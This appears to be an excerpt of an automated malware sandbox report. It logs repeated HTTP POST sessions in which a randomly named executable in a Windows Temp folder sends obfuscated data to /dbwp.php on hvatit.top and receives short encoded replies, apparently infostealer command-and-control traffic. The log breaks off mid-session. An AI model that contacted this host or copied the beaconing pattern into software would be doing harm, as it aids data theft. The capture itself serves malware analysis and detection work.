                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:20.225775957 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:20.422074080 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        10 | 192.168.2.4 | 49746 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:20.555720091 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:21.220643044 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:21.348033905 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        11 | 192.168.2.4 | 49747 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:21.497766018 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:22.181421041 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:22.315757036 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        12 | 192.168.2.4 | 49748 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:22.445745945 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:23.110151052 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:23.239974022 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        13 | 192.168.2.4 | 49749 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:23.367980957 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:24.041440010 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:24.222552061 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        14 | 192.168.2.4 | 49750 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:24.355138063 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:25.028357983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:25.156081915 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        15 | 192.168.2.4 | 49751 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:25.289416075 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:25.954807997 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        16 | 192.168.2.4 | 49752 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:25.292602062 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:25.981359959 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:26.116364002 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        17 | 192.168.2.4 | 49753 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:26.242513895 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:26.919713974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:27.121907949 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        18 | 192.168.2.4 | 49754 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:27.241972923 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:27.907552004 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:28.039904118 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        19 | 192.168.2.4 | 49755 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:28.177366018 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:28.859024048 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:28.991667986 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        20 | 192.168.2.4 | 49756 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:29.116153002 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:29.474160910 CEST2560OUTData Raw: 5a 5c 59 5f 5f 59 55 50 5d 5f 54 57 54 50 5b 51 5a 51 59 5a 52 55 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\Y__YUP]_TWTP[QZQYZRUT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\'W)?_8!>:844T3*35Y3-*;=,.?!]'/Z,
                                                        Aug 31, 2024 09:32:29.798165083 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:29.931833029 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        21 | 192.168.2.4 | 49757 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:30.063206911 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:30.411686897 CEST2560OUTData Raw: 5a 5b 59 55 5f 5a 55 51 5d 5f 54 57 54 5a 5b 5d 5a 57 59 5f 52 5d 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[YU_ZUQ]_TWTZ[]ZWY_R]T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3":+_4S!>-$7( &:7&&7X3>%<]3?,//!]'/Z,-
                                                        Aug 31, 2024 09:32:30.754542112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:30.890379906 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        22 | 192.168.2.4 | 49758 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:31.127619028 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:31.474204063 CEST2552OUTData Raw: 5a 59 59 55 5a 5f 55 50 5d 5f 54 57 54 58 5b 53 5a 5c 59 5c 52 51 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYUZ_UP]_TWTX[SZ\Y\RQTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y&!9=) 6'-,; + W0$Z'&S++/??7W,?!]'/Z,
                                                        Aug 31, 2024 09:32:31.816381931 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        23 | 192.168.2.4 | 49759 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:31.136121035 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:31.489849091 CEST1436OUTData Raw: 5a 55 59 5f 5a 58 50 57 5d 5f 54 57 54 5f 5b 51 5a 50 59 52 52 51 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUY_ZXPW]_TWT_[QZPYRRQT^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&2*C+:#5>'./44 ':+'%^$R?;_=/;,/!]'/Z,
                                                        Aug 31, 2024 09:32:31.816292048 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:31.936556101 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 54 24 38 2a 50 34 38 2a 52 2a 5a 26 0d 27 20 23 59 38 08 22 5e 2a 17 1a 06 2a 04 02 57 27 5b 30 5e 30 3b 36 1c 26 3f 02 1d 30 34 21 5b 07 10 22 10 31 07 38 01 3b 02 00 58 26 56 3d 5a 20 1f 0c 19 2a 5b 2d 5b 20 2b 26 07 26 38 32 1a 2c 2a 22 50 28 00 3c 00 3e 01 27 00 25 28 2b 50 00 12 26 52 26 01 27 0b 21 58 35 00 21 06 38 0e 30 1b 3b 12 23 28 30 5c 2b 38 08 0f 33 12 3a 1f 20 23 3d 5a 27 31 31 02 3c 2e 30 08 29 2c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #T$8*P48*R*Z&' #Y8"^**W'[0^0;6&?04!["18;X&V=Z *[-[ +&&82,*"P(<>'%(+P&R&'!X5!80;#(0\+83: #=Z'11<.0),&].#V6YV


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        24 | 192.168.2.4 | 49760 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:32.069358110 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:32.429802895 CEST2560OUTData Raw: 5f 58 5c 54 5f 5d 50 51 5d 5f 54 57 54 5e 5b 51 5a 54 59 5d 52 5d 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\T_]PQ]_TWT^[QZTY]R]TSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&1?V5$_-04;&*4'/X31?++_<< ,!]'/Z,=
                                                        Aug 31, 2024 09:32:32.753007889 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:32.939672947 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        25 | 192.168.2.4 | 49761 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:33.069237947 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:33.427269936 CEST2560OUTData Raw: 5f 5e 5c 56 5a 5f 50 55 5d 5f 54 57 54 5a 5b 51 5a 56 59 5e 52 54 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^\VZ_PU]_TWTZ[QZVY^RTTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X'!)=:+"89, <V$8Q'($.-<<<.?!]'/Z,-
                                                        Aug 31, 2024 09:32:33.755444050 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:34.091114998 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ
                                                        Aug 31, 2024 09:32:34.309154987 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        26 | 192.168.2.4 | 49762 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:34.309899092 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2548
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:34.661679029 CEST2548OUTData Raw: 5a 5c 5c 52 5a 5f 50 54 5d 5f 54 57 54 58 5b 54 5a 55 59 5e 52 57 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\RZ_PT]_TWTX[TZUY^RWTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.31&A<'#-#,<Z#+V'9#36<3-"W+;3_(?78?!]'/Z,!
                                                        Aug 31, 2024 09:32:35.002019882 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:35.139503002 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        27 | 192.168.2.4 | 49763 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:35.274986029 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:35.630455017 CEST2560OUTData Raw: 5f 58 59 53 5a 54 55 55 5d 5f 54 57 54 5f 5b 51 5a 57 59 5c 52 55 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYSZTUU]_TWT_[QZWY\RUTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$W*C+_45+:,4'$$%'0>(/]?,;!]'/Z,
                                                        Aug 31, 2024 09:32:36.002275944 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:36.136115074 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        28 | 192.168.2.4 | 49764 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
